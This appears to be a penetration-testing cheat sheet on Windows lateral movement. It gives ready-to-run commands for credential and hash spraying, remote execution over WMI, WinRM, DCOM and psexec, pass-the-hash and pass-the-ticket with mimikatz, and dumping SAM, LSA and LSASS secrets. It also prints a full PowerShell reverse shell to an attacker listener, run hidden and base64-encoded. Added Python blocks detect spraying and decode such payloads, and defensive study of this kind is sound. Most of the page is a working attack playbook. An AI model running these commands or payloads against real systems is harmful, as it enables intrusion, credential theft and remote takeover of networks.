Lateral Movement

https://wadcoms.github.io/#

Spraying with crackmapexec

Usernames and passwords:

crackmapexec smb <IP/SUBNET> -u users.txt -p passwords.txt -d <domain>
crackmapexec winrm <IP/SUBNET> -u users.txt -p passwords.txt -d <domain>
crackmapexec rdp <IP/SUBNET> -u users.txt -p passwords.txt --continue-on-success --rdp-timeout 30

Hashes

crackmapexec smb <IP/SUBNET> -u users.txt -H <HASH> -d <domain>
crackmapexec winrm <IP/SUBNET> -u users.txt -H <HASH> -d <domain>
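The spraying runs above leave a distinctive trace on the target side: one source failing against many distinct accounts in a short window, while each account's own failure count stays below lockout. As an added example (not part of the original page), a small Python detector over constructed 4625-style records; the record layout, window and threshold are assumptions for illustration.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed 4625 (logon failure) records, reduced to the fields the
# detector needs: time, source IP, target account, NTSTATUS. Not real data.
SAMPLE_4625 = [
    ("2024-05-01T09:00:01", "10.10.10.50", "alice", "0xC000006A"),  # bad password
    ("2024-05-01T09:00:02", "10.10.10.50", "bob",   "0xC000006A"),
    ("2024-05-01T09:00:03", "10.10.10.50", "carol", "0xC000006A"),
    ("2024-05-01T09:00:04", "10.10.10.50", "dave",  "0xC000006A"),
    ("2024-05-01T09:00:05", "10.10.10.50", "erin",  "0xC0000064"),  # no such user
    ("2024-05-01T09:00:06", "10.10.10.50", "frank", "0xC000006A"),
    ("2024-05-01T09:30:00", "10.10.10.77", "alice", "0xC000006A"),  # one user mistyping
    ("2024-05-01T09:31:00", "10.10.10.77", "alice", "0xC000006A"),
]

def detect_spray(records, window=timedelta(minutes=10), min_accounts=5):
    """Return {source_ip: sorted distinct accounts} for every source that fails
    against at least min_accounts distinct accounts inside one sliding window.
    Spraying is one password tried across many users, so the signal is breadth
    of accounts per source; per-account attempt counts (what lockout policies
    watch) stay low and are not the right measure."""
    by_source = defaultdict(list)
    for ts, src, user, _status in records:
        by_source[src].append((datetime.fromisoformat(ts), user.lower()))
    hits = {}
    for src, attempts in by_source.items():
        attempts.sort()
        for i, (start, _) in enumerate(attempts):
            # Accounts seen from this attempt forward while still inside the window.
            seen = {u for t, u in attempts[i:] if t - start <= window}
            if len(seen) >= min_accounts:
                hits[src] = sorted(seen)
                break
    return hits
```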

WMI / WinRM (PORT 5985 / 5986)

WMI

With WMI we can create a process on the target machine.

If ReturnValue = 0 the process has been created successfully.

wmic /node:<IP> /user:<USER> /password:<PASSWORD> process call create "calc"

PowerShell exploitation

Store the credentials in PSCredential object:

$username = '<USERNAME>';
$password = '<PASSWORD>';
$secureString = ConvertTo-SecureString $password -AsPlaintext -Force;
$credential = New-Object System.Management.Automation.PSCredential $username, $secureString;

Create a Common Information Model (CIM) session:

$options = New-CimSessionOption -Protocol DCOM;
$session = New-CimSession -ComputerName <IP> -Credential $credential -SessionOption $options;
$command = 'calc';

Invoke Cim:

Invoke-CimMethod -CimSession $session -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine = $command};

You can run a reverse shell instead of calc by updating the $command variable.

Generate the base64 encoded payload with Python on the Kali machine:

import base64

# Reverse shell one-liner; replace <IP> and <PORT> with the listener address.
payload = '$client = New-Object System.Net.Sockets.TCPClient("<IP>",<PORT>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'

# PowerShell -e expects base64 of the UTF-16LE encoded script.
cmd = "powershell -nop -w hidden -e " + base64.b64encode(payload.encode('utf-16le')).decode()

print(cmd)
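On the receiving side an analyst has to reverse this step: pull the -e argument out of a logged command line, decode it, and see what the script does. The Python below is an added example, not from the page; the sample command line is constructed inside the block and the indicator list is an illustrative assumption.

```python
import base64
import re

# Illustrative indicators a triage analyst looks for in decoded PowerShell
# (assumed list, not exhaustive).
INDICATORS = ("TCPClient", "iex", "Invoke-Expression", "DownloadString", "-nop", "hidden")

def encode_for_powershell(script):
    """Same transform as the page's encoder: -e takes base64 of UTF-16LE text."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")

def decode_encoded_command(cmdline):
    """Return the script carried by -e/-ec/-enc/-EncodedCommand, or None."""
    m = re.search(r"(?i)\s-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", cmdline)
    if not m:
        return None
    try:
        # PowerShell only accepts UTF-16LE here; if the bytes do not decode as
        # such (odd length, bad surrogates) it is not a valid encoded command.
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None

def triage(cmdline):
    """Decode the command line and list which indicators it or the decoded
    script contain. Returns (script, matched); script is None if nothing
    was encoded."""
    script = decode_encoded_command(cmdline)
    if script is None:
        return None, []
    haystack = (cmdline + "\n" + script).lower()
    return script, [i for i in INDICATORS if i.lower() in haystack]

# Constructed sample as it would appear in a 4688 or Sysmon Event 1 record.
SAMPLE_SCRIPT = '$client = New-Object System.Net.Sockets.TCPClient("192.0.2.10",4444); iex $data'
SAMPLE_CMDLINE = "powershell -nop -w hidden -e " + encode_for_powershell(SAMPLE_SCRIPT)
```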

WinRM

There is also a command-line alternative to PowerShell for WinRM: WinRS.

In order to use evil-winrm you need the username and password of the user.

evil-winrm -i <IP_ADDRESS> -u <USERNAME> -p <PASSWORD>

PsExec /wmiexec / smbexec (PORT 445)

The user has to have administrative rights and the ADMIN$ share has to be present.

You can use psexec or smbexec if you have user credentials or an NTLM hash; a writable share has to be available.

Credentials

impacket-psexec <domain>/<user>:<password>@<victim_ip>

Hash

impacket-psexec <domain>/<user>@<victim_ip> -hashes <LMHash:NTHash> # LMHash can be filled with 32 zeros

Pass the Hash

Port 445 has to be enabled.

The Pass the Hash method works only for NTLMv1.

If we crack a password and/or can dump the SAM hashes, we can leverage both for lateral movement in networks.

Pass the password

You can pass the credentials to netexec and scan the network:

netexec smb 10.10.10.10/24 -u user -p Password1 -d contoso.com --local-auth # change network, domain and credentials

Pass the hash

You can pass the NTLM hash to netexec and scan the network in the same way as above:

crackmapexec smb <3_OCTET_IP>.0/24 -u <USER> -H <HASH> --local-auth # change IP, mask, user, hash

More info

Use CME to dump valuable data:

crackmapexec smb 10.10.10.10/24 -u administrator -H a21aavioe2akdrf3a542 --local-auth --sam # change IP, mask, user, hash

Dump the LSA:

crackmapexec smb 10.10.10.10/24 -u administrator -H a21aavioe2akdrf3a542 --local-auth --lsa # change IP, mask, user, hash

Check built in modules:

crackmapexec smb -L

Dump the LSASS credentials (returns NTLM hash):

crackmapexec smb 10.10.10.10/24 -u administrator -H a21aavioe2akdrf3a542 --local-auth -M lsassy # change IP, mask, user, hash

Netexec database:

cmedb

Access the share:

smbclient \\\\<IP>\\<SHARE> -U <USER> --pw-nt-hash <HASH>

Code execution

impacket-wmiexec -hashes :<NTLM_HASH> <USER>@<IP>

Overpass the hash

The TGT can only be used on the machine it was obtained on.

Abuse an NTLM user hash to gain a full Kerberos TGT.

sekurlsa::pth /user:<USER> /domain:<DOMAIN> /ntlm:<NTLM_HASH> /run:powershell

Generate a Kerberos ticket:

net use \\<share>

List Kerberos tickets:

klist

Reuse the TGT:

.\PsExec.exe \\<SHARE> cmd

Pass the ticket

No administrative privileges required.

Takes advantage of a TGS, which can be re-injected elsewhere on the network: the method takes someone else's TGS and uses it for our own session.

Export all tickets from the memory using mimikatz:

sekurlsa::tickets /export

Verify tickets existence:

dir *.kirbi

Use the exported ticket:

kerberos::ptt <TICKET>

DCOM

Local Administrator access and port 135 are required.

Create DCOM instance:

$dcom = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application.1","<IP>"))

Execute shell command:

$dcom.Document.ActiveView.ExecuteShellCommand("cmd",$null,"/c calc","7")

Execute reverse shell encoded in base64:

$dcom.Document.ActiveView.ExecuteShellCommand("powershell",$null,"powershell -nop -w hidden -e <BASE64_ENCODED_PAYLOAD>","7")
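Both the WMI/CIM process creation earlier on this page and the MMC20 DCOM execution here show up in process-creation telemetry as parentage: WmiPrvSE.exe spawning the requested command, or a DCOM-activated mmc.exe (started by svchost with -Embedding) spawning the shell. The Python below is an added example, not the page's own material; the records are constructed Sysmon Event 1 style entries and the field names are assumptions.

```python
# Constructed process-creation records (Sysmon Event ID 1 style, trimmed).
# Not real telemetry; paths are the usual Windows locations.
SAMPLE_PROCS = [
    {"pid": 500, "ppid": 4, "image": r"C:\Windows\System32\svchost.exe", "cmdline": "svchost.exe -k DcomLaunch"},
    {"pid": 900, "ppid": 500, "image": r"C:\Windows\System32\wbem\WmiPrvSE.exe", "cmdline": "WmiPrvSE.exe -secured -Embedding"},
    {"pid": 910, "ppid": 900, "image": r"C:\Windows\System32\calc.exe", "cmdline": "calc"},  # Win32_Process.Create
    {"pid": 1200, "ppid": 500, "image": r"C:\Windows\System32\mmc.exe", "cmdline": r'"C:\Windows\system32\mmc.exe" -Embedding'},
    {"pid": 1210, "ppid": 1200, "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd /c calc"},  # ExecuteShellCommand
    {"pid": 2000, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 3000, "ppid": 2000, "image": r"C:\Windows\System32\mmc.exe", "cmdline": r'"C:\Windows\system32\mmc.exe" services.msc'},
    {"pid": 3010, "ppid": 3000, "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd"},  # console from a hand-started MMC
]

def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()

def classify_lineage(procs):
    """Return {pid: technique} for processes whose parent chain matches the
    remote-execution patterns covered on this page."""
    by_pid = {p["pid"]: p for p in procs}
    findings = {}
    for p in procs:
        parent = by_pid.get(p["ppid"])
        if parent is None:
            continue
        pname = basename(parent["image"])
        # Win32_Process.Create via WMI/CIM runs the new process under the WMI
        # provider host, so WmiPrvSE.exe is the parent of whatever was launched.
        if pname == "wmiprvse.exe":
            findings[p["pid"]] = "wmi_process_create"
        # MMC20.Application.ExecuteShellCommand: the DCOM-activated mmc.exe
        # (started by svchost with -Embedding) is the parent of the shell. An
        # mmc.exe a user opened from Explorer has neither property and is skipped.
        elif pname == "mmc.exe" and "-embedding" in parent["cmdline"].lower():
            grand = by_pid.get(parent["ppid"])
            if grand is not None and basename(grand["image"]) == "svchost.exe":
                findings[p["pid"]] = "dcom_mmc20_exec"
    return findings
```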